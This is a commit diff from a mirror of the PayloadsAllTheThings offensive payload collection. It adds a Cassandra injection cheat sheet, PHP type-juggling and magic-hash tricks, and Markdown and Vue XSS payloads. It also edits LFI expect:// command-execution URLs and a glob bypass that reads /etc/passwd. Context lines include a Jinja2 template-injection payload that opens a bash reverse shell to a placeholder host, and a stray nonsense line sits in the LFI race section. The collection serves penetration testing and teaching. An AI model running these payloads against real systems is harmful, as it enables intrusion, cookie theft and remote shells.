mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-18 10:26:09 +00:00
Cassandra SQL + XSS MD + PHP Type Juggling
This commit is contained in:
parent
90f4c3634e
commit
2a080f82e6
@ -174,8 +174,8 @@ Fun fact: you can trigger an XSS and bypass the Chrome Auditor with : `http://ex
|
||||
### Wrapper expect://
|
||||
|
||||
```powershell
|
||||
http://example.com/index.php?page=php:expect://id
|
||||
http://example.com/index.php?page=php:expect://ls
|
||||
http://example.com/index.php?page=expect://id
|
||||
http://example.com/index.php?page=expect://ls
|
||||
```
|
||||
|
||||
### Wrapper input://
|
||||
@ -245,7 +245,7 @@ http://example.com/index.php?page=path/to/uploaded/file.png
|
||||
In order to keep the file readable it is best to inject into the metadata for the pictures/doc/pdf
|
||||
|
||||
## LFI to RCE via upload (race)
|
||||
|
||||
Worlds Quitest Let's Play"
|
||||
* Upload a file and trigger a self-inclusion.
|
||||
* Repeat 1 a shitload of time to:
|
||||
* increase our odds of winning the race
|
||||
|
@ -1,6 +1,35 @@
|
||||
# PHP Juggling type and magic hashes
|
||||
|
||||
## Exploit
|
||||
## Type Juggling
|
||||
|
||||
True statements
|
||||
|
||||
```php
|
||||
var_dump('0010e2' == '1e3'); # true
|
||||
var_dump('0xABCdef' == ' 0xABCdef'); # true PHP 5.0 / false PHP 7.0
|
||||
var_dump('0xABCdef' == ' 0xABCdef'); # true PHP 5.0 / false PHP 7.0
|
||||
var_dump('0x01' == 1) # true PHP 5.0 / false PHP 7.0
|
||||
var_dump('0x1234Ab' == '1193131');
|
||||
|
||||
'123' == 123
|
||||
'123a' == 123
|
||||
'abc' == 0
|
||||
|
||||
'' == 0 == false == NULL
|
||||
'' == 0 # true
|
||||
0 == false # true
|
||||
false == NULL # true
|
||||
NULL == '' # true
|
||||
```
|
||||
|
||||
NULL statements
|
||||
|
||||
```php
|
||||
var_dump(sha1([])); # NULL
|
||||
var_dump(md5([])); # NULL
|
||||
```
|
||||
|
||||
## Magic Hashes - Exploit
|
||||
|
||||
```php
|
||||
<?php
|
||||
@ -8,9 +37,6 @@ var_dump(md5('240610708') == md5('QNKCDZO'));
|
||||
var_dump(md5('aabg7XSs') == md5('aabC9RqS'));
|
||||
var_dump(sha1('aaroZmOk') == sha1('aaK1STfY'));
|
||||
var_dump(sha1('aaO8zKZF') == sha1('aa3OFF9m'));
|
||||
var_dump('0010e2' == '1e3');
|
||||
var_dump('0x1234Ab' == '1193131');
|
||||
var_dump('0xABCdef' == ' 0xABCdef');
|
||||
?>
|
||||
```
|
||||
|
||||
|
@ -102,6 +102,8 @@ who$@ami
|
||||
Bypass blacklisted word with variable expansion
|
||||
|
||||
```powershell
|
||||
/???/??t /???/p??s??
|
||||
|
||||
test=/ehhh/hmtc/pahhh/hmsswd
|
||||
cat ${test//hhh\/hm/}
|
||||
cat ${test//hh??hm/}
|
||||
|
37
SQL injection/Cassandra Injection.md
Normal file
37
SQL injection/Cassandra Injection.md
Normal file
@ -0,0 +1,37 @@
|
||||
# Cassandra Injection
|
||||
|
||||
> Apache Cassandra is a free and open-source distributed wide column store NoSQL database management system
|
||||
|
||||
## Cassandra comment
|
||||
|
||||
```sql
|
||||
/* Cassandra Comment */
|
||||
```
|
||||
|
||||
## Cassandra - Login Bypass
|
||||
|
||||
### Login Bypass 0
|
||||
|
||||
```sql
|
||||
username: admin' ALLOW FILTERING; %00
|
||||
password: ANY
|
||||
```
|
||||
|
||||
### Login Bypass 1
|
||||
|
||||
```sql
|
||||
username: admin'/*
|
||||
password: */and pass>'
|
||||
```
|
||||
|
||||
The injection would look like the following SQL query
|
||||
|
||||
```sql
|
||||
SELECT * FROM users WHERE user = 'admin'/*' AND pass = '*/and pass>'' ALLOW FILTERING;
|
||||
```
|
||||
|
||||
Example from EternalNoob : [https://hack2learn.pw/cassandra/login.php](https://hack2learn.pw/cassandra/login.php)
|
||||
|
||||
## Thanks to
|
||||
|
||||
* [Injection In Apache Cassandra – Part I - Rodolfo - EternalNoobs](https://eternalnoobs.com/injection-in-apache-cassandra-part-i/)
|
@ -1,6 +1,6 @@
|
||||
# MYSQL Injection
|
||||
|
||||
## MySQL
|
||||
## MySQL
|
||||
|
||||
```sql
|
||||
# MYSQL Comment
|
||||
|
@ -1,6 +1,6 @@
|
||||
# SQL injection
|
||||
|
||||
A SQL injection attack consists of insertion or "injection" of a SQL query via the input data from the client to the application
|
||||
A SQL injection attack consists of insertion or "injection" of a SQL query via the input data from the client to the application.
|
||||
|
||||
## Summary
|
||||
|
||||
@ -9,6 +9,7 @@ A SQL injection attack consists of insertion or "injection" of a SQL query via t
|
||||
* [CheatSheet OracleSQL Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20injection/OracleSQL%20Injection.md)
|
||||
* [CheatSheet PostgreSQL Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20injection/PostgreSQL%20Injection.md)
|
||||
* [CheatSheet SQLite Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20injection/SQLite%20Injection.md)
|
||||
* [CheatSheet Cassandra Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20injection/Cassandra%20Injection.md)
|
||||
* [Entry point detection](#entry-point-detection)
|
||||
* [DBMS Identification](#dbms-identification)
|
||||
* [SQL injection using SQLmap](#sql-injection-using-sqlmap)
|
||||
|
@ -201,15 +201,21 @@ Inject this template
|
||||
{{ config['RUNCMD']('bash -i >& /dev/tcp/xx.xx.xx.xx/8000 0>&1',shell=True) }} # connect to evil host
|
||||
```
|
||||
|
||||
## AngularJS
|
||||
## Client Side Template Injection
|
||||
|
||||
### AngularJS - Basic injection
|
||||
### AngularJS
|
||||
|
||||
```javascript
|
||||
$eval('1+1')
|
||||
{{1+1}}
|
||||
```
|
||||
|
||||
### Vue JS
|
||||
|
||||
```javascript
|
||||
{{constructor.constructor('alert(1)')()}}
|
||||
```
|
||||
|
||||
## Thanks to
|
||||
|
||||
* [https://nvisium.com/blog/2016/03/11/exploring-ssti-in-flask-jinja2-part-ii/](https://nvisium.com/blog/2016/03/11/exploring-ssti-in-flask-jinja2-part-ii/)
|
||||
|
BIN
Server Side Template injections/serverside.png
Normal file
BIN
Server Side Template injections/serverside.png
Normal file
Binary file not shown.
After Width: | Height: | Size: 44 KiB |
@ -6,7 +6,7 @@ Cross-site scripting (XSS) is a type of computer security vulnerability typicall
|
||||
- [Identify an XSS endpoint](#identify-an-xss-endpoint)
|
||||
- [XSS in HTML/Applications](#xss-in-htmlapplications)
|
||||
- [XSS in wrappers javascript and data URI](#xss-in-wrappers-javascript-and-data-uri)
|
||||
- [XSS in files](#xss-in-files)
|
||||
- [XSS in files (XML/SVG/CSS/Flash/Markdown)](#xss-in-files)
|
||||
- [Polyglot XSS](#polyglot-xss)
|
||||
- [Filter Bypass and Exotic payloads](#filter-bypass-and-exotic-payloads)
|
||||
- [CSP Bypas](#csp-bypass)
|
||||
@ -233,6 +233,15 @@ XSS in SVG (short)
|
||||
<svg><title><![CDATA[</title><script>alert(3)</script>]]></svg>
|
||||
```
|
||||
|
||||
XSS in Markdown
|
||||
|
||||
```csharp
|
||||
[a](javascript:prompt(document.cookie))
|
||||
[a](j a v a s c r i p t:prompt(document.cookie))
|
||||
[a](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K)
|
||||
[a](javascript:window.onerror=alert;throw%201)
|
||||
```
|
||||
|
||||
XSS in SWF flash application
|
||||
|
||||
```powershell
|
||||
@ -693,6 +702,8 @@ Exotic payloads
|
||||
|
||||
## CSP Bypass
|
||||
|
||||
Check the CSP on [https://csp-evaluator.withgoogle.com](https://csp-evaluator.withgoogle.com) and the post : [How to use Google’s CSP Evaluator to bypass CSP](https://blog.thomasorlita.cz/vulns/google-csp-evaluator/)
|
||||
|
||||
### Bypass CSP using JSONP from Google (Trick by [@apfeifer27](https://twitter.com/apfeifer27))
|
||||
|
||||
//google.com/complete/search?client=chrome&jsonp=alert(1);
|
||||
|
@ -132,3 +132,9 @@ Angular 1.0.1 - 1.1.5
|
||||
```javascript
|
||||
{{constructor.constructor('alert(1)')()}}
|
||||
```
|
||||
|
||||
Vue JS
|
||||
|
||||
```javascript
|
||||
{{constructor.constructor('alert(1)')()}}
|
||||
```
|
Loading…
Reference in New Issue
Block a user